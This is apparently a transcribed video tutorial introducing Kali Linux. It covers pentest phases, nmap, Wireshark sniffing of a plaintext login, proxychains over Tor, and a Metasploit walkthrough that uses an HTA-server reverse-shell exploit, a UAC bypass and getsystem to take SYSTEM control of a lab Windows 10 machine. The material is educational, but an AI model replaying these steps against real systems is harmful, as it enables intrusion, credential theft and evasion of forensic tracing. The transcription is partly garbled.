hello everyone it's no secret that the vast bulk of internet usage is vulnerable to hacking whether it's through hazardous messaging apps or faulty operating systems penetration testing has become the norm for vulnerability assessment in order to fill this vacuum in digital security kali linux is a well-known operating system in this fight against hackers kali linux a distribution designed specifically for penetration testers has layers of features that we will go over in today's lesson and take a look at some of the tools and features that the operating system has to offer let's take a look at the videos topics and features that the operating system has to offer let's take a look at the videos topics we start by learning the requirements of an operating system like kali linux we learn more about the core features of the os and its intricacies moving on we take a look at the five distinct stages of penetration testing that dictate the flow of vulnerability assessment in general next we learn about some important tools that can be found on kali linux which are geared specifically for ethical hacking purposes and finally we have an extensive demonstration where we work on some basic terminal commands proxy tools and a couple of highly regarded software from the crux of the operating system choose from over 300 in-demand skills and get access to 1 000 plus hours of video content for free visit skill up by simply learn click on the link in the description to know more let's start by learning why one should learn kali linux in the first place in today's world in organizations most valuable asset is its information or data this is true for all kinds of businesses be it public or private on a daily basis they all deal with enormous amounts of sensitive information as a consequence terrorist groups hacking teams and cyber thieves often attack them to ensure the safety and protection businesses use a variety of security measures and regularly upgrade their index organizations must be proactive in this age of digitalization by regularly assessing and updating their security everyday hackers discover new methods to breach firewalls ethical hackers or white hat hackers provide a fresh perspective on security they conduct penetration tests to validate security measures generally they will penetrate your networks and give you relevant information about your security posture once an organization has this knowledge it may upgrade its security procedures accordingly the latest version of kali linux comes with more than 600 penetration tools pre-installed after reviewing every tool that was included in backtrack developers have eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality occasionally when conducting penetration testing or hacking we must automate our activities since there may be hundreds of conditions and pillows to test and manually examining everything is time consuming to improve our productivity we utilize tools that come pre-packaged with kali linux these tools not only save us time but also accurately capture and process the data the kali linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external assets greatly reduces the risk of source contamination although penetration tools tend to be written in english the developers have ensured that kali includes true multilingual support allowing more users to operate in the native language and locate the tools they need to do for the job since arm based single board systems like the raspberry pi are becoming more and more prevalent and inexpensive the development team knew that kali's arm support would need to be as robust as they could manage with fully working installations kali linux is available on a wide range of arm devices and has arm repositories integrated with a mainline distribution so tools for arm are updated in conjunction with the rest of the distribution tools now that we understand the necessity for an operating system like linux let us take a look at some of its core features and offerings to the ethical hacking world kali linux formerly known as backtrack linux is an open source linux distribution which is aimed at advanced penetration testing and security auditing it contains several hundred tools targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering kali linux is a multi-platform solution accessible and freely available to information security professionals and hobbyists among all the linux distributions kali linux takes its route from the debian operating system debian has been a highly dependable and stable distribution for many years providing a similarly strong foundation to the kali linux desktop while the operating system is capable of practically modifying every single part of our installation the networking components of kali linux come disable by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a deeper element of security and control to the most enthusiastic of users let us now take a look at the five stages or phases of penetration testing this is the first stage of the penetration test which is known as the reconnaissance phase in this stage the security researcher collects information about the target it can be done actively which means you are collecting information without contacting the target or even both it helps security firms gather information about the target system network components active machines open ports and access points operating system details etc this activity can be performed by using information available in the public domain and using different tools the next phase is more tool oriented rather than perform manually and it is the scanning phase the penetration tester runs one or more scanner tools to gather more information about the target the penetration tester runs one or more scanner tools to gather information about the target by using various scanners such as war dialers port scanners network mappers and vulnerability scanners the tester collects as many vulnerabilities which help to turn attack in a more sophisticated way the next stage is known as the gaining access phase in this phase the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous stage exploitation may be buffer overflow attacks denial of service or dos attacks session hijacking and many more basically penetration tester extracts information and sensitive data from servers by gaining access using different tools in the maintaining access phase the penetration tester tries to create a back door for himself it helps him to identify hidden vulnerabilities in the system and can later act as a gateway to retrieve control of the system in the final phase of covering tracks the penetration tester tries to remove all logs and footprints which help the administrator identify his presence this helps the tester to think like a hacker and perform corrective actions to mitigate those activities now that we understand the basics of penetration testing and how ethical hackers go about the way let us take a look at some notable tools which can be used on kali linux at the top of the chain lies nmap nmap is a free and open source utility port scanner which can be used for network discovery and security auditing many systems and network administrators also find it useful for tasks such as network inventory managing service upgrade schedules and monitoring host or service uptime it is most beneficial in the early stages of ethical hacking where a hacker must figure the possible entry point to a system before running the necessary exploits thus allowing the hacker to leverage any insecure openings and breach the device it's a part of the scanning phase of the penetration testing nmap uses raw ip packets in novel ways to determine what hosts are available on the network what services these hosts are offering what operating systems they are running and their versions what type of packet filters and firewalls are in use and dozens of other characteristics it was designed to rapidly scan large networks but works fine against single hosts as well since every application that connects to a network needs to do so via a port the wrong port or server configuration can open a can of worms which lead to a thorough breach of the system and ultimately a fully hacked device next on the list we have metasploit the metasploit framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systemic vulnerabilities on networks and servers as a part of the third stage of penetration testing it's an open source framework which can be easily customized and used with most operating systems with metasploit the ethical hacking team can use a ready-made or custom code and introduce it into a network to probe for weak spots as another flavor of threat hunting once these flaws are identified and documented the information can be used to address systemic weaknesses and prioritize solutions once a particular vulnerability is identified and the exploit is fed into the system there are a host of options for the hacker depending on the vulnerability hackers can even run root commands from the terminal allowing complete control over the activities of the compromised system as well as all personal data stored on the device a big advantage of metasploit is the ability to run full-fledged scans on a target system thereby giving a detailed picture of the security index of said system this also provides the necessary exploits that can be used to bypass the firewalls and the antivirus software having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers as denoted by the high rank in this list at number 3 we have wireshark wireshark is the world's foremost and widely used networking protocol analyzer it lets you see what happening on your network at a microscopic level and is a de facto standard across many commercial and non-profit enterprises government agencies and educational institutions wireshark is a popular open source tool to capture network packets and converts them to human readable binary format it provides every single detail of the organization's network infrastructure it consists of devices designed to help measure the ins and outs of the network the information collected to wireshark can be used for various purposes such as real time or offline network analysis identification of the traffic coming onto your network its frequency and its latency between specific hops this helps network administrators generate statistics based on real-time data wireshark is also a cross-platform tool that can be installed on windows linux and mac systems to enable hackers in all ecosystems to monitor network traffic irrespective of the operating system the development team is determined to maintain this level of freedom for their users in the foreseeable future the next tool on our list is air garden which is a part of the third phase of penetration testing this is a multi-use bash script for linux systems to hack and audit wireless networks like our everyday wi-fi router and its counterparts along with being able to launch denial of service attacks on compromised networks this multi-purpose wi-fi hacking tool has very rich features which support multiple methods for wi-fi hacking including multiple wps hacking modes all-in-one wep attack handshake file capturing evil twin attacks pixie dust and so much more it usually needs an external network adapter that supports monitor mode which is necessary to be able to capture wireless traffic traversing the air channels to its open source nature air garden can be used with multiple community plugins and add-ons thereby increasing its effectiveness against a wide variety of routers both in the 2.4 gigahertz band and 5 gigahertz band the next tool is john the ripper john the ripper is an open source password security auditing and password recovery tool available for many operating systems john the ripper jumbo supports hundreds of hash and cipher types including for use of passwords of operating systems web apps groupware database servers network traffic captures encrypted private keys file systems and document files some of the key features of the tool include offering multiple modes to speed up password tracking automatically detecting the hashing algorithm used by the passwords and the ease of running and configuring the tool making it a password tracking script of choice for novices and professionals alike it can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources the word list being used in this dictionary attacks can be used from the user's end allowing for a completely customizable process now that we have covered the basics of kali linux let us take a look at the agenda for our demo today we start out with a few terminal commands that are a basic part of a linux operating system configure our own proxy chains to maintain anonymity while running penetration testing attacks on our victims next we run a few nmap scans on a local windows 10 machine to find out the type of information that can be gathered in such a scenario moving on we use wireshark to monitor internet traffic and understand the importance of encryption and security when browsing the world wide web next we learn about metasploit and its various applications and the line of vulnerability assessment of a device and finally we use matters ploy to take root access of a fully updated windows 10 computer system let's begin with some terminal basics on kali linux when most people hear the term linux they envision a complex operating system used only by programmers however the experience is not as frightening as it appears linux is an umbrella term for a collection of free and open source unix operating systems there are many variants like ubuntu fedora debian these are distributions which will be a more precise term when using a linux operating system you will most likely utilize a shell which is a command line interface that provides access to the operating system services the majority of linux distributions ship with a graphical user interface also known as gui as their primary shell this is done to facilitate user interaction in the first place having said that a command line interface is suggested due to its increased power and effectiveness by entering the commands into the cli tasks that require a multi-step gui procedure may be completed in a matter of seconds we can start the terminal by clicking on the prompt icon here on top once the terminal is open we can put up our commands the first command that we are going to look into is pwd pwd stands for present working directory as of right now what you are seeing is the terminal window by default if i write pwd and press enter this shows the directory in which the terminal is being run on as of right now it's in the nf folder of my desktop which is specifically this folder if i open up this folder you can see it is currently empty as in it has no contents if i use another command known as mkdir which is supposed to stand for make directory and i write nf2 shortage for new folder too if i open up the nf you can see the new folder is created this is how the pwd command works another important command to change directories it's called the cd command let's say right now if i am in nf i want to create a new file in an f2 folder or something else in the nf2 folder i have to shift to cd and f2 now if i write pwd it will show the present working directory of home simply learn desktop nf and inside that i am in nf2 right now it is done to navigate to the linux files and this directories it requires either the full path or just the name of the directory if we have to move a completely different folder on a completely different file then we can use the entire path like this for now cd works another few commands is we can write cd dot dot and it will come back one folder now the pwd will be just nf and not nf2 let's say we are in this folder and we want to go a different file let's say if we just go for cd home simpler that's it right now these are the folders in our current present working directory we have the desktop the documents downloads etc from here we can again go to the desktop using the same cd command cross check the changing of directories and check the files again and yes there we go nf how do we know this what are the command that we are used to show the files and folders that folder is known as the ls command ls can be used to view the contents of a directory by default this command will display the contents of your current working directory if we add some other parameters we can find the contents of other directories as well there are some hidden files as well in linux which cannot be showed just with ls for example if you just go to cd etc which is a configuration folder for linux if you write ls now these are the files that can be seen if we want to see the hidden files we'll have to add one more parameter here like ls minus a and as you can see the number of files have increased this time around there are other things as well that we can see with linux ls minus al will show the hidden files along with some of the parameters and some of the permissions that has been provided for each file as you can see many of these files have root access some of them can write some of them can read it differs file to file and the ls minus al command is used to check each of these files permission and change them accordingly if needed the next command that we can look for is the cat command or concatenate it is one of the most frequently used commands and it is used to list the contents of a file on the output for example let's say if i have a file at the desktop in this nf2 folder i will create a document create an empty file e5 i'll open up the document and i'll write it as hello kali i will save this up now to change the directories from etc to nf2 we have already discussed how to use the cd command using just the folder name now if we want to go to the entire directory we can write siri home as you can see it is already prompting us to complete the name of the directory at this point we just have to press tab and it completes it for ourselves next we already know we have to enter the desktop nf and nf2 and this brings us to the current working directory here if we press ls we can find a file over here now as discussed for the concatenate it is used to show the contents of a file so right now if we press c80 which stands for concatenate e file as you can see we have written hello kali in the text file and we can see the output right now we can also use it to create new files for example if we write cat any file name such as e file 2 here we can write anything hello kali again once we press ctrl c here we can check e file 2 and we have hello kali again printed over here we can see the same using the concatenate command as well if i press ls you can see we have two files here and i can go with cat e file 2 and i have hello kali again this is how the concatenate command works apart from this it can be used to copy there is a different command like called cp which is used to copy the files from one place to another mind to this is not moving this is only going to copy the command for example currently our pwd which is the present working directory is in the nf2 folder as you can see over here let's copy the e file to to the nf folder we can write cp e file 2 and give the path of the nf folder which will be home simply learn desktop nnf now if i press ls i will find both the files in nf2 since i copied to go back to the nf folder again we can again use the same command of no no we can again use the home simply learn desktop and just nf no nf2 this time just enough as you can see this will change back our present working directory now when we press ls we will find the e file to file and the nf2 folder and we can confirm this using the gui as well this is the nf folder and you can see the nf2 folder and the e file to document if i write cat e file 2 cat e file 2. we can see the contents of the file now this can be done using moving as well for example if i go to cdnf2 which is the inside folder it has both the document files like e file and e file 2. let's say i want to move the e file completely from nf2 to nf1 instead of writing cp the command i'm going to use is mv mve file and again give the path of the folder into which i have to copy which will be again home simply learn desktop and nf as you can see the contents of the nf2 have appeared here and e file has been moved from nf2 to nf this is this nf2 and we don't find e file here anymore if we press cd dot dot and we go back to nf ls right now and we can file both the files e file that we moved and e file to that we copied from the nf2 folder so this is how copying and moving will work using the terminal now this is just a simple one line statement that might take a couple of clicks when using gui this is why the command line interface is considered to be much more streamlined for linux operating systems another very important command for linux operating system is the sudo command sudo is short for super user do the command enables you to perform tasks that require administrative or root permissions we can think of it as how we run programs as administrator on windows systems it is not advisable to use this card for daily use because it might be easy for an error to occur and the permissions of root are very intricate so new beginners are advised to use the sudo command only when absolutely necessary for example sudo su with this command i am giving this terminal a root permission this su stands for this user at this point it's going to ask for my admin password once i enter my password and i now have root access note how the password that i entered did not show up here this is a security measure to prevent people from snooping on your root password which is the end game of all this operating system as you also can see the symbol changed if the dollar symbol is showing its source as a standard user when you switch to root you can easily see a hash symbol this opens up a separate shell inside this terminal command for example we can exit out of the root user to the standard user using the command exit and once again we have the dollar sign and the root has vanished over here there are some commands that will only work with administrative access for example when updating the kali linux system we have to use apt update as you can see it says problem unlinking the file because permission denied now let's try this using sudo sudo apt update as you can see it is updating the package repositories which work as the software installed on the system this can be done using either writing the sudo command every time we want to perform a root access or we can just write sudo su once and write apt update alone the fetching is complete over here for the second example let's say i just write sudo su and this time is not going to ask me the password because at this current terminal process i've already provided the rules password once and it is in memory right now now when we use to update the system we had to write sudo apt update that was because we were running it as a standard user now we are running it as a root user so all we have to write is apd update and it's going to continue its work there you go another command that can be useful is the ping command it's pretty self-explanatory it's going to be checking the internet connectivity it can be used to check internet connectivity or you can see if the there is a local server on your system which needs to be pinged then you can check that for example if we have to write ping and we can use either ip address or domain let's say if we want to check that if we can access google.com using this kali linux installation or not we can write ping google.com and you can see it shows the bytes being sent and received and how much time it took to take up the request this can be done for local systems as well for example this installation of kali linux is being run on a virtual machine once this machine is running i still have my whole host machine running over here the ip address of which is 192.168.29 179. if i try to ping this from here as you can see the time to complete the request is drastically low compared to a website on the internet considering this is on the local network this is how the ping command is worked and it can show you what kind of packages are transmitted how many are received if there was any kind of packet loss between the connection window and other details a very important command when working with the terminal for long duration is the history command pretty self-explanatory there are so many commands that are being run sometimes people forget what was the change they did oh what was the directory name they put a history command helps to recover some of the commands that we have written it doesn't go all the way back but it takes up many commands that were inputted in the last few processes this is how the history command works these are some of the most commonly used terminal commands if you want to learn more about this terminal and every other feature of this please let us know in the comment section and we'll try to make an in-depth tutorial special if you could repeat if you want to learn more about the terminal please let us know in the comment section and we will try to make an in-depth tutorial specifically for terminal commands on linux moving on we learn how to configure proxy chains on our system proxying refers to the technique of bouncing your internet traffic through multiple machines to hide the identity of the original machine it is a good tool that hackers use to accomplish this goal is proxychains essentially you can use proxychains to run any program to a proxy server this will allow you to access internet from behind a restrictive firewall which hides your ip address proxies even allows you to use multiple proxies at once by chaining them together one of the most important reasons that proxy chains is used in a security context is that it's easy to evade detection attackers often use proxies to hide their true identities while executing an attack and when multiple proxies are chained together it becomes harder and harder for forensic professional to trace the traffic back to the original machine when these proxies are located across countries investigators would have to obtain warranties in the local jurisdictions where every proxy is located to see how proxy chain works let's open firefox first and check our current ip address right firefox and there we go as we can see firefox is now open let's check our current ip address right now if you go to an address called my ip.com and you can see the easily detects our country is in india and this is a public ip address now if we move to the terminal again here we can now write proxy chains minus h what this minus h does is it finds a help it it stands for the help file this is for help file what we found out using this is proxychains has a config file here etc proxychains4.conf this is the config file found using this config file we can customize how our proxy change should work if we want to open that we have to use it in a text editor on windows we have notepad and other things like that microsoft word to edit documents on linux we have a tool called nano to access the nano we use the command nano and give the path of the file that we want to check as of right now the proxy change config file is located over here so we're going to follow the path there chains 4 dot conf and here we go we see the config file there are three basic types of proxy chaining here we have a strict chain where all the proxy in the list will be used and they will be chained in order we have a random chain where each connection made through proxy chains will be done by a random combo of proxies in the proxy list and your dynamic chain it's the same as strict chain but dead proxies are excluded from the chain and here we can set up whichever type we want to enable or disable a particular type we use the hash symbol here as you can see right now all the lines have a hashtag symbol at the front except this one a dynamic chain this is the current one being used let's say if i want to use a strict chain method so i can add a hash value here and remove the hash here at one point of time any one of these three four types should be enabled let's go for the dynam um dynamic chain we can disable this trick chain by putting the hashtag in front and removing the dynamic chain as you can see below we have few commands to how to handle the nano text editor this symbol is known as the control button on your keyboard now if we want to write out which is synonymous to saving the file supposed to go with control o so if i press ctrl o on my keyboard it says file name to write and we have to press enter here since we want to overwrite the proxychains4.conf file we don't want to create a new file over here so just press enter and we get a permissioned right this permission denied we're getting is because we have opened this using a standard user etc is a system folder to be able to use make some changes we have to use it using a sudo command to exit this nano we have to use the control x command we use control x we're going to clear and this time we're going to use the sudo command sudo nano etc proxy chains 4 dot conf and we have the same file open up again now this time if you want to make a change let's say we're going to add a strict chain instead of a dynamic chain which remove the hashtag from straight we're going to use ctrl o for the save file option we're going to press enter and it says root 160 lines again if you want to reverse this change we put the hashtag over here enable dynamic chain we press ctrl o press enter and it says root 160 lines now we can exit straight away using the control x format right now we have not provided any file or a proxy chain we can have proxy ip addresses from the internet but we have to make sure that they are safe and they don't snoop on our data when there is no proxy change being provided personally it going it's going to use the tor network but for that we have to start tor tower is a service in linux to know more about the store we can write sudo systemctl which is used to know the status of services on the linux operating system and status of tor system ctl sorry uh as instead of stl it should be system ctl status tor as you can see it is a toss service anonymizing overlay network for tcp connections and it's currently inactive now to start this up we have to write sudo systemctl start dot now if we repeat the same sudo system ctl status store as you can see it's active now you can see the green logo over here okay to integrate the firefox and the browser we can use the proxy chains command directly over here we can write proxy chains we can use firefox to launch our web browser and let's say if we want to visit google.com we press enter and the firefox window is launched and it should open up google.com next and there we go if we go to myip.com once again as you can see we have a different ip address and the country is unknown as well so this is how we can use proxy chains to anonymize internet usage when using kali linux next on our agenda is the ability to scan networks using nmap at its core nmap is a network scanning tool that uses ip packets to identify all the devices connected to a network can learn more about nmap using the help file as you can see these are some of the parameters that can be used when scanning ports of our system you can see the version and the url of the webs of the service over here the primary uses of nmap can be broken into three group processes first the program gives you detailed information on every ip active on your network and then each ipa can then be scanned secondly it can also be used to providing a lot of live hosts and open ports as well as identifying the os of every connected device thirdly nmap has also become a valuable tool for users looking to protect personal and business websites using nmap to scan your own web server particularly if you're hosting your website from home is essentially simulating the process that a hacker would use to attack your site attacking your own site in this way is a powerful way of identifying security vulnerabilities as we already discussed the host windows 10 machine on the system has an ip address a 192 168 29.179 if you want to test the os scan of the system we're going to first get the root permission over here we use the pseudo command and now we are root user we're going to launch the command nmap minus o which is supposed to be an os detection scan the ip address we can use of the host system 192.168.29.179 in a legitimate penetration testing scenario we can use the ip address of the device over here we are going to let it scan for a while and it's going to give us some guesses on what can the os be as you can see the scan is done and it has shown some of the ports that are open you can see the msrpc port open at the https 443 port open which is used to connect to the internet and it has some aggressive os gases as well for example it thinks there's a 90 94 chance that it's going to be a microsoft windows xp service pack 3. that's partly because a lot of the windows xp update packages are still prevalent on windows now that the os detection is confirmed there are multiple more details that we can gather from nmap let's go with the nmap minus a command which is supposed to capture as much data as possible there is also a speed setting you can call it a speed setting or a control setting of the minus t minus t ranges from t 0 to t 1 to t through all the way up to d phi this basically determines how aggressively the victim is being scanned if you scan slowly it will take more time to provide the results but it will also give a less chance for the intrusion detection system on the vulnerable machine firewall to detect that someone is trying to penetrate the network for now if we want to go with somewhat of a high speed we can go with the t4 and provide the same ip address of the local machine i am trying to attack it's going to take a little bit of time since it's trying to capture a lot of information as you can see the results are now here it launched a scan and took a few top ports that are most likely vulnerable from a windows xp perspective and it showed a few ports over here it has not shown 991 filtered ports which could not be attacked anyway since they were closed for outside access it shows a few fingerprint settings like the connection policies and the port details it shows an http options some other intricate details that can be used when you attacking its servers it shows a vmware version that it's running and some few other ports over here apart from that we also have the aggressive os guesses over here just like we did with the minus o and you can see this time it is showing windows 7 as 98 percent no exact os matches since uh if there was any exact voice matches we could have seen a hundred percent chances over here this is a trace route a trace route will be the time and the path a connection request takes from the source to the destination for example this request went from 192.168.72.2 to a destination address since this is a local machine it took only a single step on multiple occasions if you're trying to access a remote system it's going to be a number of tray suits when it jumps from firewall to firewall and router to router this is how we can use nmap to find information about a system and find some vulnerable ports we can access moving on we have a tutorial on how to use wireshark to sniff network traffic to start using wireshark we're going to have to open the application first now during installation of wireshark there is an option to enable if non-root users can be able to capture traffic or not in my installation i have disabled that so i will be launching wireshark when using the root user itself also to capture data we need an external wi-fi adapter you can see it over here in the vm tab removable devices re-link a02.1 and wlan this is an external wi-fi adapter which is inserted into my usb system you can see it over here if i write iw config this is the one wlan 0. this is absolutely necessary because we need to have a monitor mode required we won't need it for sniffing data on wireshark right now but it's going to be necessary later on in this tutorial as well as we will see for now we can just start up via shark by writing its name on the command line and it should start the program here we go here it's going to check which of the adapters we want to use for example right now the eth0 which supposes stand for ethernet 0 port you can see data is being transmitted up and down we're going to select eth0 and we have started capturing data you can see this uh data request from the source to destination from the time and the which protocol it is following everything we can see and we can see the ipv4 flags here as well as you can see over here to capture internet traffic we can try running firefox if we just write wikipedia.com and you can see the number of requests increasing okay this is spelling mistake wikipedia here you can see the application data of all these requests going up and they're connected to a destination server of one zero through one zero to one sixty six point two two four now if we even if we check the transmission control protocol flags over here and so many more things we cannot find anything beneficial as you can see the information over here is gibberish which is supposed to be since it's supposed to be encrypted now this is possible due to this being an https website hence you can see the lock symbol over here and connection is supposed to be secure now what about http ports we have seen many people recommend to not visit http ports repeat we have seen many people recommend to not visit http websites and even if we have to visit to not provide any critical information for example let's go to a random http page over here as you can see this is saying connection is not secure and this is an http http page and not https now let's check for some of the information that is passing through this this is a login form let's say i have a legitimate account over here if i write my account name and my password is supposed to be password one two three four i press login and uh the password does not match because i do not have an account over here but let's say i did and i was logged in as expected we can go to wireshark we can use filters over here now all the requests that i am sending it's a tcp request so i can write a filter containing tcp contains whatever string if it is being passed let's say for the end username i write my account name so i can just write my account name over here and press enter to find a request over here now as you can see there are many flags over here if we go to the http html form url encoded and open up some of its flags as you can see i can see my account name and simply learn password over here this is the same details that i input on the website let's say i did have a legitimate account on this website i would have logged in with no problems but anyone who would be using wireshark to sniff on the data can easily get my credentials from here this is why it's recommended to not provide any information on http pages the security is not up to the mark and always look for the lock symbol when visiting any website or making any internet transactions or providing any information this is how we can use wireshark to detect transmission and sniff packet data that is being transferred to the network adapter next we have to learn about what is metasploit the metasploit project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and ids development we can open up the terminal here we're going to allow root access and to open up metasploit the keyword is msf console it's going to take a little bit of time to start it up [Music] now the metasploit console has been loaded from here we can decide what type of attack we want to launch and what kind of exploits we can launch against vulnerable targets for example like we already discussed i'm running this virtual machine on a windows 10 host machine so if i open the command prompt from my windows 10 over here if i need to check the ip address once i go with ipconfig here you can see the ip address of this local machine moving on if we have to attack that machine let's say we want to see what kind of exploits are going to work over there now we already know that windows has some common vulnerabilities one of those vulnerabilities is the hta server vulnerability hta is supposed to be a html application but when past the right payload it can be used to open a back door into a system to start off with the metasploit and accessing such applications we're going to use the command use exploit and the name of the reverse hta server is this windows misc for miscellaneous hda server as you can see it already found this one all right now there are some options that we need to set for this exploit to go through for example you can see some of the options over here there's a payload the payload is supposed to be the malicious file that we are going to send on the html application which allows us to give the back door for example right now the payload which is the malicious file is a windows meterpreter reverse tcp completely understandable now let's set the l host l host and r host and srv host should be the one where we are going to launch the attack from for example if we launched another tab of this console and we just press i f config the ip address is 192.168.72 130. so we're going to set the lhost as 192.168.72.130 and we're going to do the same thing with srv host we're going to set a port where we need to capture the backdoor access next the payload has already been set this payload will launch a back door and give us meter printer access to the system meterpreter is can be considered as an upgrade of a normal command prompt shell we will look into it once we get the access in the first place now that we have set the commands we can press on exploit and press enter now you can see we have a url over here we're going to copy this url once the url is copied we take it into the browser and paste it this will ask us to download this file now as per browser security settings this file should be blocked by default we can decide to keep it and with the correct formulation of this malicious package even the website browser antivirus software's will not be able to detect good payloads we're going to save this file and we're going to open it publisher could not be verified if we press run and we go back to our meetup data access over here you can see it has already captured a url fnhd server and it is writing delivering payload just have to wait for a few seconds so the payload is delivered it has sent this much amount of data meterpreter session one is opened then we should get the access soon there we go now to understand where is the session set we can write sessions minus i as you can see it has a metaphase over here we're going to write sessions minus i the session id is one so we're going to write one and we have the metadata access now to get a fair idea of the system we're going to write sysinfo and it's going to the computer name the os architecture all these things we can write the help command to see what are the things that we can get out of the system we can take screenshots we can control the webcam and start a video chat we can take a lot of things over here there are other commands as well where we can change the file directory like the cat command cd command there are so many things that work in the normal cmd which we can run on the meter beta as well now if you want to access this command prompt of the system directly we can go with this we have to write shell and there we go we are in the downloads folder right now to see if this is the same computer or not we're going to write ipconfig as you can see it is our mesh victim machine with 192 168 but 29.171 we can just press exit and we're back with the meter beta access this is how we can use meter printer and metasploit to gain access to a windows 10 machine next let's take a look at how we can get root access from a windows 10 system we just learned how we can get a meterpreter access from a system we can background this meter predator session by writing background and pressing enter we can still we can still see the shares session is minus i it's still present over here now these kind of access are not administrative access these are the kind of backdoors that can be created for standard users but to get a complete access of a system including the program files the windows documents we need to have her root access or administrative access to that we're going to use another exploit reminder that the meter bitter session of the standard access is already present and we're not messing with it right now we're going to set up another session albeit with the same machine that exploit name is use exploit windows local bypass uac event viewer and there we go now if we check the options that we can put in the system we have to choose an exploit target we need to put a session as well let's say we going to use the session one this is the session that has the meta with access with the standard user it doesn't have the system user we're going to write set session 1 and we're going to run exploit run a few commands and it opened a second meterpreter session as you can see it is the session 2. if i write sysinfo you can still see i'm not the system user right now i'm still just a normal user how can we check that if you go to shell it still sees the user generally downloads all these things if i press exit go back to the meter picture there is a command on meter peter get system it attempts to elevate your privilege to that of the local system which basically means you get promoted into root access so if we write get system and due to pipe impersonation we now have the system root access as you can see now it has become x64 and we are the admin users now if i go to shell i can easily go back windows and i can easily access these ones this kind of control over the windows folders and the program files folders these kind of things are not possible if you are not an admin access or the command prompt has not been run with admin permissions this is how we can use privilege escalation to get into an admin access system we use the second exploit which was the bypass us event viewer exploit and essentially used it with the first session as you can read here windows escalation usb protection bypass it was first disclosed on 2016 but it still works on some systems this is how we can get root access on a windows 10 installation hope you learned something new today if you have any doubts regarding the topic mentioned in the lesson please feel free to let us know in the comment section below [Music] you